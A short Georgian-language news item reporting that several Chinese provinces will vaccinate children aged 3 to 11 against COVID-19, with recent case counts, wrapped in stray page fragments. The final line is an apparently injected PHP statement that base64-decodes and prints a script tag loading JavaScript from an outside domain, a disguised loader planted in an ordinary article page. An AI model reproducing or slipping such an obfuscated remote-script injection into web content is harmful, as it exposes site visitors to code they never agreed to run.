celsiusi
ავერსი საქკაბელი
ჩინეთში კორონავირუსის საწინააღმდეგო ვაქცინით 3 წლის ასაკიდან ბავშვების ვაქცინაციას დაიწყებენ.
 
ქალაქებისა და პროვინციების ადგილობრივმა მთავრობებმა ჩინეთის მინიმუმ 5 პროვინციაში უკვე გამოაცხადეს, რომ 3-დან 11 წლამდე ასაკის ბავშვებს ვაქცინაციას ჩაუტარებენ.
 
ვაქცინაციის კამპანიის გაფართოება ქვეყნის ზოგიერთ ნაწილში კოვიდ ინფიცირების შემთხვევების ზრდის გამო ახალი შეზღუდვების დაწესების ფონზე ხორციელდება.
 
ჩინეთის ჯანდაცვის ეროვნული კომისიამ განაცხადა, რომ ბოლო 24 საათის განმავლობაში ქვეყანაში ინფიცირების 35 ახალი შემთხვევა გამოვლინდა, მათგან ოთხი განსუში, სადაც დღეიდან ყველა ტურისტული ადგილი დაიხურა.
 
ჩინეთში, ბოლო მონაცემებით, მოსახლეობის 76% სრულადაა ვაქცინირებული. ხელისუფლება კოვიდ შემთხვევების გავრცელების მიმართ ნულოვანი ტოლერანტობის პოლიტიკას ახორციელებს.
932
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");